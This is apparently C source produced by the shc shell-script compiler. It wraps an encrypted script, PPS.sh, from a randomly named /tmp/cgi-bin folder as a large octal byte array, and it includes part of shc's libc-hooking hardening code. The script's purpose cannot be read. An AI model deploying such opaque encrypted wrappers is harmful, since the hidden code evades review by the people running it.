#if 0
	shc Version 4.0.3, Generic Shell Script Compiler
	GNU GPL Version 3 Md Jahidul Hamid <jahidulhamid@yahoo.com>

	shc -r -f /tmp/cgi-bin/ajsdhada1563axa184dsanj_support/PPS.sh 
#endif

static  char data [] = 
#define      rlax_z	1
#define      rlax	((&data[0]))
	"\332"
#define      chk2_z	19
#define      chk2	((&data[1]))
	"\243\153\117\171\315\077\023\031\027\246\325\010\064\063\344\227"
	"\206\212\313\250\271\227"
#define      opts_z	1
#define      opts	((&data[23]))
	"\310"
#define      msg1_z	65
#define      msg1	((&data[36]))
	"\320\152\275\344\337\110\043\130\167\032\114\202\235\141\322\056"
	"\252\047\162\006\110\003\302\222\003\132\264\014\274\262\250\050"
	"\333\027\172\377\154\171\271\261\227\320\301\113\245\325\124\051"
	"\235\254\276\254\275\021\061\336\343\205\127\154\206\146\126\324"
	"\222\333\214\354\136\077\167\352\323\104\170\176\314\022\261\351"
	"\044\151\210\112\131\261\370"
#define      pswd_z	256
#define      pswd	((&data[138]))
	"\262\301\026\312\201\255\233\354\152\177\313\263\243\044\052\275"
	"\161\255\317\042\226\364\213\037\076\345\321\045\314\377\002\104"
	"\006\336\333\322\201\151\036\253\251\220\232\127\253\176\047\105"
	"\344\016\240\257\023\031\251\120\211\362\166\125\362\170\231\370"
	"\127\165\313\330\337\351\204\211\172\037\340\046\235\007\153\201"
	"\026\014\061\051\046\332\172\257\315\360\004\277\151\236\270\301"
	"\023\204\231\363\155\036\174\350\075\134\016\333\144\172\135\173"
	"\206\216\244\254\151\037\133\066\020\137\366\172\376\256\073\022"
	"\062\325\005\240\363\201\211\061\336\227\015\102\021\152\276\227"
	"\370\143\104\142\202\237\231\222\377\217\014\375\076\110\017\161"
	"\035\025\022\021\226\233\103\164\062\120\267\103\272\165\333\263"
	"\331\037\025\133\277\257\356\277\076\373\275\175\103\315\356\141"
	"\342\000\162\170\234\265\355\316\005\245\022\300\033\355\163\364"
	"\015\211\117\315\070\076\215\167\071\112\364\175\027\343\336\372"
	"\344\120\163\200\006\141\116\014\006\141\314\041\117\100\025\134"
	"\312\145\052\003\243\267\173\335\001\160\132\031\123\070\024\070"
	"\211\207\270\220\351\007\234\357\150\151\020\267\252\045\024\165"
	"\213\076\170\056\366\364\013\370\144\146\021\067\347\074\306\231"
	"\376\335\144\177\212\377\153\365\177\067\250\042\134\322\340\315"
	"\177\260\357\026\244\173\065\343\140\006\032\110\103\341\341"
#define      shll_z	10
#define      shll	((&data[432]))
	"\301\111\353\146\010\102\243\316\365\130\012\347"
#define      inlo_z	3
#define      inlo	((&data[442]))
	"\202\175\345"
#define      text_z	4083
#define      text	((&data[848]))
	"\347\301\271\307\216\070\170\176\117\035\371\204\000\132\213\033"
	"\242\316\374\204\020\272\311\321\003\016\377\102\323\144\051\272"
	"\045\342\201\264\033\372\062\152\030\054\356\031\207\172\064\051"
	"\110\060\256\130\353\170\052\357\206\052\061\131\216\132\024\264"
	"\074\226\151\130\220\234\303\251\310\261\302\120\053\366\172\164"
	"\047\050\315\022\240\367\001\047\042\062\201\260\215\225\145\312"
	"\053\316\042\274\153\345\145\064\227\047\204\303\035\376\067\104"
	"\046\005\127\307\375\130\356\037\213\157\317\030\005\065\342\060"
	"\004\005\354\157\352\121\244\202\171\050\105\226\047\175\333\116"
	"\202\063\025\177\213\003\237\026\163\156\057\170\244\021\250\251"
	"\026\225\030\001\347\274\203\140\345\311\367\014\107\323\132\312"
	"\006\157\111\221\163\351\250\346\127\330\137\374\352\010\245\001"
	"\235\276\002\205\173\206\345\140\120\335\155\227\260\310\141\266"
	"\070\253\110\253\224\361\222\354\311\361\350\264\372\216\265\227"
	"\114\270\034\307\076\002\050\217\337\225\046\217\135\210\106\226"
	"\063\216\101\310\200\324\264\111\306\235\375\300\053\263\127\170"
	"\153\164\100\252\166\150\071\126\376\140\345\134\350\053\362\034"
	"\272\064\344\072\010\230\204\316\065\202\217\141\065\347\331\240"
	"\133\031\113\322\202\204\050\200\345\016\335\315\072\317\351\364"
	"\004\316\057\014\146\263\333\234\065\152\376\152\121\327\013\255"
	"\361\126\177\164\333\250\365\300\267\322\216\361\242\170\346\246"
	"\106\026\263\255\311\216\112\376\370\110\151\112\040\165\367\021"
	"\313\167\206\247\040\173\150\330\115\367\312\357\157\261\226\266"
	"\307\111\144\220\327\256\217\320\366\371\033\026\156\023\050\071"
	"\212\256\341\253\052\111\203\167\100\115\147\260\376\375\147\306"
	"\107\313\126\125\177\322\056\076\366\342\175\132\215\171\222\260"
	"\054\206\062\000\014\176\346\135\073\245\310\335\231\003\344\056"
	"\106\162\332\213\116\227\276\003\240\235\270\376\360\244\316\374"
	"\311\030\163\243\102\252\141\341\300\101\307\327\230\256\311\240"
	"\173\166\272\267\216\224\301\002\022\227\334\111\337\346\115\120"
	"\174\317\147\060\016\315\377\014\237\125\174\025\010\204\001\121"
	"\306\173\270\245\061\224\117\262\016\333\212\213\130\356\207\242"
	"\312\001\275\026\355\133\161\125\244\375\336\146\253\220\127\165"
	"\353\170\050\122\100\072\050\075\274\356\052\020\304\234\357\362"
	"\212\217\155\344\055\042\166\211\336\216\361\070\125\105\235\073"
	"\202\236\357\260\135\015\125\101\117\101\372\163\165\356\241\075"
	"\132\067\223\217\021\365\345\140\143\211\075\242\366\367\336\015"
	"\310\274\016\310\056\044\104\162\315\037\373\243\127\174\047\073"
	"\330\034\166\017\231\367\137\100\001\261\055\205\332\276\154\256"
	"\376\037\125\235\101\070\115\344\241\206\207\236\222\217\122\056"
	"\351\020\373\134\076\216\241\162\173\361\164\254\127\240\261\377"
	"\322\051\246\006\067\276\247\362\030\262\226\003\266\261\064\040"
	"\064\025\233\317\154\131\356\036\023\336\121\154\211\263\234\356"
	"\377\046\310\032\240\321\321\201\137\265\025\265\127\002\143\162"
	"\014\306\321\133\215\247\307\331\275\254\374\200\074\354\076\275"
	"\045\336\320\214\350\351\051\033\057\014\200\371\316\253\211\033"
	"\021\036\311\123\067\020\277\074\175\302\250\032\061\056\154\177"
	"\151\160\256\206\373\301\030\325\261\047\306\052\331\264\365\342"
	"\360\274\315\233\314\015\327\327\256\302\230\154\300\077\067\027"
	"\275\226\050\107\335\137\104\125\053\253\361\363\256\326\163\263"
	"\224\204\257\000\307\166\064\140\356\306\334\312\111\112\010\144"
	"\363\151\020\316\146\241\377\241\072\135\051\006\047\311\337\027"
	"\004\141\117\017\373\362\235\154\073\050\152\162\071\243\235\306"
	"\261\274\177\207\037\370\103\023\171\201\321\327\035\274\323\021"
	"\020\360\213\320\220\215\371\142\352\237\221\067\277\056\104\123"
	"\001\076\265\276\242\206\205\205\141\113\237\137\160\041\361\057"
	"\320\205\131\251\147\241\066\156\063\064\100\114\224\007\007\226"
	"\327\164\160\345\162\131\161\066\223\241\066\312\240\353\374\344"
	"\275\257\353\033\247\005\210\244\244\305\376\066\357\150\313\066"
	"\010\007\331\273\040\066\302\206\225\246\177\355\166\314\323\233"
	"\160\224\370\157\221\352\144\041\203\235\263\043\113\016\257\054"
	"\113\364\027\212\305\075\174\105\023\070\054\021\021\155\036\277"
	"\263\153\140\160\236\262\064\032\360\237\353\147\171\023\357\364"
	"\147\056\117\345\105\362\200\154\257\251\323\337\055\142\016\173"
	"\313\212\366\063\320\310\100\217\042\212\075\061\227\024\003\061"
	"\251\362\302\142\121\305\226\074\210\034\320\171\072\263\202\206"
	"\255\005\031\077\111\323\047\370\231\163\337\307\217\300\345\015"
	"\070\360\323\241\202\277\350\037\215\305\055\143\215\327\317\373"
	"\257\076\326\041\276\244\066\037\014\222\061\165\046\306\075\043"
	"\152\262\072\024\027\223\004\335\023\063\231\116\277\114\233\226"
	"\145\271\064\026\354\237\121\225\030\113\036\321\165\052\044\035"
	"\263\052\376\206\256\026\163\104\144\325\350\206\346\214\117\120"
	"\266\251\214\251\340\260\133\263\062\205\037\344\115\224\366\264"
	"\313\122\274\273\042\141\156\152\167\071\051\255\160\256\133\015"
	"\312\110\371\267\014\214\256\051\317\106\152\024\261\072\347\205"
	"\131\302\165\007\264\207\372\253\300\152\124\032\014\327\326\067"
	"\134\045\143\352\200\257\360\120\221\051\105\302\254\131\161\377"
	"\240\025\273\256\332\376\073\351\153\161\035\354\152\276\345\020"
	"\062\235\225\300\145\016\314\344\074\325\041\125\122\367\102\370"
	"\160\201\367\325\155\247\210\306\336\034\102\163\124\356\045\110"
	"\007\132\242\216\374\152\003\050\146\374\156\313\020\125\154\036"
	"\141\007\012\013\345\062\330\264\342\361\000\227\001\215\134\243"
	"\271\113\260\044\110\205\124\136\045\106\370\007\124\331\357\377"
	"\127\154\335\160\172\203\216\010\312\077\332\322\221\227\135\121"
	"\356\110\120\011\377\147\005\166\336\151\226\253\013\127\210\250"
	"\117\075\060\012\005\062\013\333\166\040\000\175\124\056\104\301"
	"\011\250\263\303\160\240\275\105\033\254\011\313\362\237\124\167"
	"\332\251\154\245\202\177\303\144\101\021\073\053\314\034\201\320"
	"\222\067\061\270\230\161\215\371\166\337\324\252\055\164\176\077"
	"\356\313\363\267\310\017\343\073\047\254\026\014\260\107\035\337"
	"\021\265\162\171\154\333\063\335\052\314\261\357\006\023\246\065"
	"\017\342\210\026\145\015\132\207\351\064\250\175\077\127\151\034"
	"\341\256\312\170\017\244\302\027\132\174\065\023\101\006\016\220"
	"\226\027\225\121\016\032\043\130\277\063\213\137\261\121\035\333"
	"\120\012\115\243\052\137\004\335\052\127\066\061\224\253\311\212"
	"\240\245\253\303\174\267\054\072\237\233\147\304\337\307\061\103"
	"\063\364\276\067\106\143\161\366\253\044\050\361\041\231\102\370"
	"\223\170\314\361\306\330\034\253\010\103\357\226\133\252\006\240"
	"\203\320\336\154\023\053\240\356\013\043\111\167\247\224\065\313"
	"\046\311\021\054\341\277\017\327\012\355\352\331\251\245\237\121"
	"\046\030\124\024\267\033\073\367\265\163\376\200\213\054\146\051"
	"\010\232\315\270\041\057\167\222\006\156\356\073\073\003\130\242"
	"\305\044\327\365\010\041\234\202\213\361\317\206\357\251\171\174"
	"\104\162\161\265\335\262\017\064\147\047\205\371\115\115\235\016"
	"\035\345\366\041\030\253\104\321\101\331\137\051\106\223\172\307"
	"\370\211\063\001\375\203\072\136\073\316\034\052\325\067\103\163"
	"\366\001\050\063\337\006\161\225\374\060\243\170\050\077\221\376"
	"\217\355\164\052\063\336\145\235\355\272\233\154\346\330\361\174"
	"\340\115\344\254\327\040\342\356\214\017\261\062\205\321\224\001"
	"\147\145\366\347\046\231\067\005\065\114\301\263\211\067\267\005"
	"\025\052\276\100\223\020\313\255\312\356\021\265\340\204\364\010"
	"\153\153\221\254\354\234\120\210\300\245\335\313\016\170\217\126"
	"\336\145\365\333\023\154\346\041\002\251\155\032\364\325\223\003"
	"\063\317\212\061\020\274\343\174\272\236\220\161\151\223\002\262"
	"\153\203\351\026\272\067\263\352\132\155\313\272\362\125\227\163"
	"\246\352\372\250\072\072\272\170\001\051\004\340\156\240\167\342"
	"\261\164\241\102\077\340\147\113\302\151\001\050\164\142\370\004"
	"\100\202\121\235\007\312\072\013\246\274\065\067\375\140\372\230"
	"\243\001\032\003\025\366\230\263\140\030\240\350\104\133\314\222"
	"\366\103\262\117\141\033\323\124\112\264\012\263\210\067\053\157"
	"\312\132\356\240\164\030\045\012\207\375\351\350\300\036\036\124"
	"\231\133\062\277\104\155\045\134\116\332\257\331\240\005\374\031"
	"\172\173\105\052\314\117\245\171\064\276\217\132\017\266\035\231"
	"\012\077\304\105\366\166\203\120\010\137\235\250\314\163\254\100"
	"\071\171\127\375\057\001\003\120\073\113\000\056\112\227\052\224"
	"\264\343\261\341\066\171\122\272\174\011\065\270\040\060\376\103"
	"\005\346\327\165\243\365\072\157\054\213\274\132\207\361\053\150"
	"\375\155\045\101\266\023\220\352\001\210\343\221\243\043\113\260"
	"\136\057\103\342\346\343\143\147\203\116\254\073\253\005\353\170"
	"\162\172\001\051\104\327\034\252\122\311\322\235\006\042\025\317"
	"\143\217\133\163\037\345\343\233\140\115\226\261\323\133\146\147"
	"\312\057\044\313\356\245\133\243\013\251\065\135\122\043\050\341"
	"\100\127\111\150\047\260\321\355\313\307\167\130\334\114\331\165"
	"\340\222\230\123\065\207\265\024\354\007\347\246\217\306\057\134"
	"\265\354\253\240\304\057\224\201\326\064\251\233\356\362\362\160"
	"\126\031\206\352\114\020\373\350\100\220\145\075\362\213\345\225"
	"\253\077\067\202\152\176\304\342\213\237\173\337\271\324\153\370"
	"\117\131\060\026\367\116\113\000\236\216\321\225\310\074\301\367"
	"\070\202\040\276\071\146\102\245\050\204\103\227\321\106\165\217"
	"\026\136\275\151\025\073\035\267\017\055\212\310\235\225\000\027"
	"\003\265\141\334\237\355\360\007\217\117\350\053\015\140\376\152"
	"\112\011\276\351\352\332\007\254\244\322\337\043\264\072\246\346"
	"\047\231\262\303\170\364\153\066\041\026\333\347\030\056\040\014"
	"\221\271\245\260\236\352\266\020\260\021\347\341\234\332\322\361"
	"\370\206\200\254\321\214\377\111\361\227\326\372\263\324\201\117"
	"\064\335\171\152\053\076\037\015\075\275\364\343\076\307\126\145"
	"\316\006\271\011\026\304\365\171\355\201\020\075\057\313\046\325"
	"\341\133\051\017\002\357\105\215\073\273\250\050\324\227\345\036"
	"\066\054\205\340\246\151\253\216\124\054\022\212\076\047\343\131"
	"\264\012\171\252\200\102\010\112\000\071\045\351\163\246\067\234"
	"\164\301\227\074\014\370\106\005\010\371\052\226\057\067\253\170"
	"\223\001\353\050\042\167\077\042\207\160\301\062\177\144\220\027"
	"\245\037\072\363\265\264\237\306\032\306\275\140\260\016\220\006"
	"\011\150\066\221\217\354\110\122\221\021\060\162\263\257\271\200"
	"\157\011\125\047\316\052\266\124\221\172\171\255\015\334\174\006"
	"\206\222\365\116\163\103\014\234\214\361\016\143\241\133\215\324"
	"\233\265\062\317\024\164\326\105\130\042\064\142\351\304\341\221"
	"\234\261\141\245\343\026\347\214\225\047\265\053\105\015\260\303"
	"\023\164\045\030\316\006\177\250\024\355\177\133\372\053\367\166"
	"\257\176\064\107\217\277\177\265\355\117\014\234\017\364\116\056"
	"\340\323\215\127\145\344\017\361\075\071\332\067\226\164\157\015"
	"\300\276\341\005\364\207\115\071\351\021\232\057\132\372\317\226"
	"\203\265\007\067\255\163\010\215\007\223\341\043\134\325\072\065"
	"\003\051\300\136\133\153\262\115\115\103\372\201\326\301\147\361"
	"\357\266\107\260\065\230\110\154\312\073\244\151\112\223\117\034"
	"\320\261\107\037\020\216\340\336\140\043\131\250\345\044\365\026"
	"\344\060\312\167\157\276\050\140\234\151\304\320\121\344\246\162"
	"\072\325\164\025\137\060\161\117\241\347\234\217\341\136\020\110"
	"\230\306\012\126\064\275\253\371\247\332\302\005\367\255\202\214"
	"\232\366\115\024\135\310\127\367\025\372\330\117\134\212\042\122"
	"\105\121\322\254\054\222\211\206\050\116\070\214\031\205\322\207"
	"\351\153\037\170\230\252\163\360\257\372\054\035\365\137\313\253"
	"\066\264\072\142\034\022\246\230\312\207\073\172\064\174\147\160"
	"\005\316\316\166\215\021\153\207\206\345\366\135\154\176\346\323"
	"\363\373\352\251\244\050\037\021\272\353\312\143\026\372\310\146"
	"\361\133\046\274\166\167\263\265\123\273\212\211\011\177\362\146"
	"\332\012\144\320\231\253\243\227\154\240\171\015\326\373\346\067"
	"\267\137\340\036\077\142\217\043\264\013\230\117\366\312\372\133"
	"\105\031\100\101\244\305\100\032\376\340\253\170\226\146\220\247"
	"\363\241\251\266\373\353\251\333\007\326\133\213\276\353\157\310"
	"\074\026\145\214\137\315\222\046\243\355\031\207\052\043\202\342"
	"\340\243\225\337\123\153\330\143\020\325\235\302\077\270\211\041"
	"\317\150\236\016\205\334\127\022\253\354\167\304\074\307\017\175"
	"\103\221\167\333\134\254\314\201\140\010\120\032\243\130\364\143"
	"\205\264\356\147\002\147\051\265\236\347\300\333\344\041\211\113"
	"\015\017\032\162\347\014\141\040\154\156\010\044\210\166\305\252"
	"\202\336\260\152\071\074\201\154\016\252\323\320\116\213\077\260"
	"\152\061\003\034\362\017\124\225\275\062\113\135\023\050\261\364"
	"\304\004\076\173\204\317\315\141\124\227\031\115\121\114\110\013"
	"\045\107\072\124\335\153\263\006\267\024\252\351\253\013\324\041"
	"\043\271\174\337\213\267\206\235\306\300\233\273\246\107\363\033"
	"\361\163\315\170\354\304\134\132\325\307\071\001\344\042\241\226"
	"\323\163\330\002\120\220\212\057\025\367\345\076\314\255\237\362"
	"\046\142\306\065\165\220\010\061\077\071\352\375\150\220\264\162"
	"\126\205\343\371\213\245\311\277\136\127\253\363\361\211\215\216"
	"\126\007\107\142\303\144\063\053\116\236\321\241\156\311\165\313"
	"\046\066\240\027\175\100\234\002\214\076\171\015\260\226\241\065"
	"\276\354\104\077\072\250\216\033\142\227\106\357\354\214\234\245"
	"\114\354\022\112\140\145\041\223\012\372\153\026\154\174\235\000"
	"\073\245\220\026\307\365\351\346\063\051\276\105\102\114\002\374"
	"\231\274\107\114\310\122\312\310\231\377\162\057\036\037\100\163"
	"\046\046\200\316\211\135\240\233\350\126\220\061\167\267\316\070"
	"\073\067\244\107\100\203\131\055\146\113\073\071\020\110\013\011"
	"\254\134\352\220\053\225\235\120\071\322\242\062\370\164\247\074"
	"\367\027\264\011\056\065\371\065\324\107\267\003\241\003\373\257"
	"\375\122\002\173\237\021\323\003\176\126\023\246\376\350\321\021"
	"\042\112\121\174\212\170\152\255\321\175\052\231\014\017\000\356"
	"\246\106\051\347\342\242\066\017\046\226\060\051\330\133\331\361"
	"\127\120\171\162\000\160\120\064\246\337\332\207\305\251\312\376"
	"\256\075\343\345\007\116\116\115\331\040\323\331\005\201\121\173"
	"\316\360\150\313\114\105\245\370\112\072\252\142\021\154\272\007"
	"\227\040\315\162\131\057\340\202\130\131\374\016\245\153\113\363"
	"\336\301\061\203\213\001\055\014\256\377\063\120\365\032\076\351"
	"\352\333\224\137\072\107\336\225\232\014\025\216\321\245\012\021"
	"\070\042\070\245\110\230\376\332\036\246\352\124\201\263\065\072"
	"\331\237\331\214\247\170\004\307\301\252\071\336\366\011\076\370"
	"\030\054\261\264\134\274\037\126\354\027\102\011\123\217\011\304"
	"\356\246\135\177\143\032\237\337\176\146\367\065\115\017\127\016"
	"\201\034\010\243\201\314\234\262\065\371\223\204\206\032\340\241"
	"\033\320\160\271\372\006\111\231\121\244\247\174\040\073\312\246"
	"\307\132\174\367\145\314\145\045\147\212\332\070\146\225\225\142"
	"\274\363\323\257\056\067\156\364\211\205\055\157\357\034\320\025"
	"\343\153\060\152\045\371\300\237\063\077\147\113\100\315\144\311"
	"\276\114\336\022\064\246\361\052\373\260\230\167\135\235\312\334"
	"\052\021\163\070\025\065\271\254\011\100\032\046\326\300\173\040"
	"\155\114\047\030\321\354\333\044\047\215\222\003\330\045\324\072"
	"\127\206\025\116\230\125\257\275\300\111\312\375\261\037\111\021"
	"\241\335\143\100\125\336\213\021\163\022\024\013\273\167\060\324"
	"\273\326\015\172\010\345\224\064\276\306\265\203\367\363\004\013"
	"\007\202\003\345\125\154\334\020\311\277\321\041\007\374\153\301"
	"\053\056\335\002\007\265\135\361\076\055\351\157\067\260\044\011"
	"\313\323\312\023\034\356\144\042\202\127\327\013\040\156\064\247"
	"\005\245\067\255\037\122\366\164\176\060\332\016\101\000\163\257"
	"\075\260\121\237\213\012\163\270\102\214\063\064\004\107\221\337"
	"\077\356\152\071\176\352\046\012\303\104\115\134\160\022\210\122"
	"\244\355\305\032\240\240\337\272\173\164\244\263\047\372\023\227"
	"\207\151\004\215\006\035\326\063\326\367\324\240\167\306\125\264"
	"\075\110\061\314\022\231\032\232\366\304\357\206\307\051\177\163"
	"\300\317\127\043\163\133\243\153\060\033\371\027\152\022\177\051"
	"\360\376\003\225\214\006\132\032\370\033\144\306\256\051\200\332"
	"\270\232\076\203\116\356\155\004\355\063\215\351\335\363\173\241"
	"\314\124\300\006\270\304\251\331\324\362\234\222\133\301\162\117"
	"\031\152\271\041\325\011\352\376\057\334\115\237\173\216\062\372"
	"\251\361\067\022\254\047\202\071\013\121\316\365\300\172\155\050"
	"\136\251\364\236\002\031\057\133\074\050\366\121\224\065\170\162"
	"\134\071\237\005\154\223\342\026\007\241\230\201\131\122\202\012"
	"\236\222\235\264\262\315\315\016\275\127\373\123\361\117\120\274"
	"\251\200\065\265\065\130\021\222\217\200\050\330\042\010\274\314"
	"\053\315\267\160\121\324\020\365\333\311\327\244\344\006\047\257"
	"\035\000\004\201\246\164\252\161\165\226\262\315\251\364\267\002"
	"\256\176\106\274\117\376\216\244\265\034\140\007\352\161\354\102"
	"\256\257\231\076\023\054\216\346\034\061\126\023\112\357\246\137"
	"\352\060\045\172\062\225\177\270\336\014\162\272\144\324\117\063"
	"\230\243\200\363\063\014\341\305\303\142\211\211\267\214\354\070"
	"\126\367\353\170\050\372\123\272\376\306\210\216\312\276\350\022"
	"\257\167\076\316\317\254\004\201\044\362\336\061\113\315\270\264"
	"\203\162\034\146\323\054\023\165\346\054\135\021\030\014\024\155"
	"\155\131\065\140\361\137\316\125\321\063\257\157\206\241\376\102"
	"\110\037\205\342\015\240\030\277\220\025\206\055\266\003\005\371"
	"\042\052\130\313\300\217\160\135\277\061\105\313\276\133\322\016"
	"\313\130\036\112\234\061\101\012\073\141\252\045\176\032\037\027"
	"\115\276\046\224\161\217\330\123\066\356\332\333\067\100\217\035"
	"\362\367\361\020\171\251\177\257\222\315\376\073\305\134\345\073"
	"\320\124\367\233\021\345\361\347\141\175\207\301\036\027\060\232"
	"\253\006\222\107\256\104\023\376\065\006\240\367\236\245\017\104"
	"\211\031\177\252\237\104\057\022\155\134\243\317\037\265\100\226"
	"\103\103\332\073\313\011\045\017\327\112\245\264\143\234\061\304"
	"\200\072\325\007\117\304\103\117\116\266\106\360\322\253\123\244"
	"\356\227\241\352\222\217\115\115\104\063\105\101\207\024\153\055"
	"\307\163\253\276\111\210\033\031\107\350\075\214\222\261\273\335"
	"\110\041\150\011\233\057\253\214\371\311\307\134\174\001\364\124"
	"\352\060\044\167\260\047\171\003\033\210\155\062\263\112\365\102"
	"\275\204\253\321\102\163\237\021\202\031\004\205\367\011\021\255"
	"\037\036\215\062\264\303\365\151\151\044\013\041\157\226\310\346"
	"\107\024\364\130\260\336\254\374\064\221\335\313\317\032\146\165"
	"\100\040\027\176\146\146\132\147\157\027\321\313\364\015\047\044"
	"\361\323\030\302\070\175\307\263\062\331\311\310\254\336\352\307"
	"\366\267\013\325\212\247\225\326\155\207\203\127\353\001\155\044"
	"\156\115\277\042\002\054\061\246\227\312\317\256\206\047\046\115"
	"\214\071\326\164\246\250\041\303\107\155\332\053\342\031\043\066"
	"\241\216\216\116\254\112\036\171\345\357\160\336\013\207\115\036"
	"\257\206\250\136\150\124\210\261\330\000\362\045\147\243\044\145"
	"\012\352\254\325\101\313\117\047\273\277\006\306\106\123\344\366"
	"\332\215\125\102\341\335\364\271\336\346\337\106\211\004\253\224"
	"\357\130\151\061\044\270\130\337\170\137\246\277\262\212\265\215"
	"\030\012\317\372\350\304\264\307\253\224\015\064\230\270\310\210"
	"\021\062\272\065\353\023\025\143\162\273\042\045\106\330\262\136"
	"\343\202\130\314\106\015\223\361\241\240\046\072\131\357\302\152"
	"\041\175\240\015\220\265\161\002\161\223\050\267\154\333\026\117"
	"\135\157\033\244\174\257\226\035\117\274\127\250\254\032\023\316"
	"\230\263\333\050\151\114\053\332\340\123\222\114\056\251\234\214"
	"\031\270\060\226\147\306\263\267\203\013\137\057\046\162\375\276"
	"\046\330\347\217\045\022\152\005\146\375\122\224\247\357\041\300"
	"\247\121\126\017\030\012\306\233\026\045\313\074\230\310\373\277"
	"\241\342\116\306\365\271\314\133\266\036\360\136\015\021\036\265"
	"\143\164\304\174\177\213\027\225\261\343\321\111\254\315\010\115"
	"\260\127\024\245\021\340\001\310\377\361\046\015\003\104\302\146"
	"\271\207\342\070\022\372\315\303\335\237\015\212\155\025\327\035"
	"\155\354\303\176\315\304\106\314\265\154\331\270\261\234\037\152"
	"\043\001\243\065\374\160\371\332\020\006\144\175\034\074\233\211"
	"\051\136\007\366\042\116\302\327\272\234\220\154\070\257\326\134"
	"\261\171\222\256\352\213\210\373\221\355\171\255\051\024\066\122"
	"\163\076\111\225\215\013\155\110\250\376\264\341\255\213\075\137"
	"\004\320\015\357\133\225\353\354\203\144\232\254\171\321\377\354"
	"\020\110\202\235\124\357\345\375\355\231\336\233\045\034\372\051"
	"\354\010\031\107\236\005\064\041\151\316\316\343\240\315\317\260"
	"\026\121\115\153\101\062\150\057\314\107\313\361\143\305\033\120"
	"\315\065\230\153\072\314\215\244\233\133\207\073\051\127\353\077"
	"\250\071\252\352\154\023\032\071\132\345\053\276\252\106\016\170"
	"\174\246\344\267\163\161\133\017\315\342\113\366\072\066\065\343"
	"\160\340\315\334\364\347\025\116\314\100\015\167\207\033\360\004"
	"\302\325\273\066\107\027\105\024\371\220\013\064\307\100\027\067"
	"\041\344\024\026\314\052\145\231\152\162\021\362\216\002\366\120"
	"\327\262\207\037\311\314\064\303\135\077\367\044\200\016\134\242"
	"\363\161\270\277\233\035\131\006\217\152\370\035\154\357\156\104"
	"\241\365\143\152\302\230\055\037\327\044\104\127\062\241\371\045"
	"\022\261\345\255\316\076\263\136\251\254\174\026\233\352\132\074"
	"\340\276\247\242\126\324\301\055\371\006\205\054\247\176\122\271"
	"\060\067\146\377\166\032\136\037\306\332\065\142\304\220\236\245"
	"\116\106\107\245\032\011\323\024\020\131\100\267\330\222\160\010"
	"\312\327\010\100\362\146\140\270\100\225\032\005\046\271\252\165"
	"\377\362\032\032\374\356\056\014\107\156\303\037\001\064\050\313"
	"\014\060\014\376\226\154\266\327\001\321\335\050\213\210\235\212"
	"\172\267\245\167\246\323\203\355\102\107\015\103\174\065\017\210"
	"\145\033\206\374\207\075\324\211\017\261\261\232\071\116\045\264"
	"\006\312\053\255\235\257\232\340\366\250\044\162\335\063\372\103"
	"\117\201\100\326\276\024\140\315\306\021\147\377\140\214\264\146"
	"\127\337\023\364\216\256\325\205\127\371\370\064\055\362\170\174"
	"\164\270\122\062\315\263\000\224\304\150\223\045\365\110\214\114"
	"\047\240\101\266\117\026\073\246\020\063\332\075\046\123\271\233"
	"\014\014\316\332\277\316\156\204\067\002\251\055\112\065\171\162"
	"\325\273\050\044\322\144\312\342\230\245\037\277\370\330\132\005"
	"\345\050\337\244\367\115\050\056\117\322\133\231\007\325\013\335"
	"\221\064\002\143\230\315\106\061\162\145\360\153\076\112\160\043"
	"\163\120\310\152\235\361\231\355\303\365\207\312\313\223\250\134"
	"\307\252\300\140\167\006\221\352\154\201\126\252\314\307\316\077"
	"\027\226\252\264\207\103\242\113\070\051\025\003\274\276\140\203"
	"\150\040\344\340\047\165\313\223\367\041\076\303\350\015"
#define      date_z	1
#define      date	((&data[5851]))
	"\022"
#define      tst2_z	19
#define      tst2	((&data[5855]))
	"\361\127\166\344\102\061\303\320\353\104\042\143\336\155\262\246"
	"\046\076\031\242\161\220"
#define      xecc_z	15
#define      xecc	((&data[5876]))
	"\055\074\114\312\254\123\053\122\265\310\234\051\047\232\071\264"
	"\132\113\215"
#define      lsto_z	1
#define      lsto	((&data[5893]))
	"\016"
#define      msg2_z	19
#define      msg2	((&data[5896]))
	"\031\137\224\363\354\365\134\222\143\233\201\260\063\221\336\246"
	"\033\250\121\375\067\151\021\201\247"
#define      tst1_z	22
#define      tst1	((&data[5921]))
	"\330\152\157\274\071\172\222\212\155\117\344\037\302\057\364\117"
	"\164\351\013\271\216\100\137\251\130\206\037\204"
#define      chk1_z	22
#define      chk1	((&data[5949]))
	"\241\366\014\141\015\014\066\014\147\274\217\010\355\035\034\356"
	"\314\126\345\065\102\271\022\131\210\316\063\323\134"/* End of data[] */;
#define      hide_z	4096
#define SETUID 0	/* Define as 1 to call setuid(0) at start of script */
#define DEBUGEXEC	0	/* Define as 1 to debug execvp calls */
#define TRACEABLE	1	/* Define as 1 to enable ptrace the executable */
#define HARDENING	0	/* Define as 1 to disable ptrace/dump the executable */
#define BUSYBOXON	0	/* Define as 1 to enable work with busybox */

#if HARDENING
static const char * shc_x[] = {
"/*",
" * Copyright 2019 - Intika <intika@librefox.org>",
" * Replace ******** with secret read from fd 21",
" * Also change arguments location of sub commands (sh script commands)",
" * gcc -Wall -fpic -shared -o shc_secret.so shc_secret.c -ldl",
" */",
"",
"#define _GNU_SOURCE /* needed to get RTLD_NEXT defined in dlfcn.h */",
"#define PLACEHOLDER \"********\"",
"#include <dlfcn.h>",
"#include <stdlib.h>",
"#include <string.h>",
"#include <unistd.h>",
"#include <stdio.h>",
"#include <signal.h>",
"",
"static char secret[128000]; //max size",
"typedef int (*pfi)(int, char **, char **);",
"static pfi real_main;",
"",
"// copy argv to new location",
"char **copyargs(int argc, char** argv){",
"    char **newargv = malloc((argc+1)*sizeof(*argv));",
"    char *from,*to;",
"    int i,len;",
"",
"    for(i = 0; i<argc; i++){",
"        from = argv[i];",
"        len = strlen(from)+1;",
"        to = malloc(len);",
"        memcpy(to,from,len);",
"        // zap old argv space",
"        memset(from,'\\0',len);",
"        newargv[i] = to;",
"        argv[i] = 0;",
"    }",
"    newargv[argc] = 0;",
"    return newargv;",
"}",
"",
"static int mymain(int argc, char** argv, char** env) {",
"    //fprintf(stderr, \"Inject main argc = %d\\n\", argc);",
"    return real_main(argc, copyargs(argc,argv), env);",
"}",
"",
"int __libc_start_main(int (*main) (int, char**, char**),",
"                      int argc,",
"                      char **argv,",
"                      void (*init) (void),",
"                      void (*fini)(void),",
"                      void (*rtld_fini)(void),",
"                      void (*stack_end)){",
"    static int (*real___libc_start_main)() = NULL;",
"    int n;",
"",
"    if (!real___libc_start_main) {",
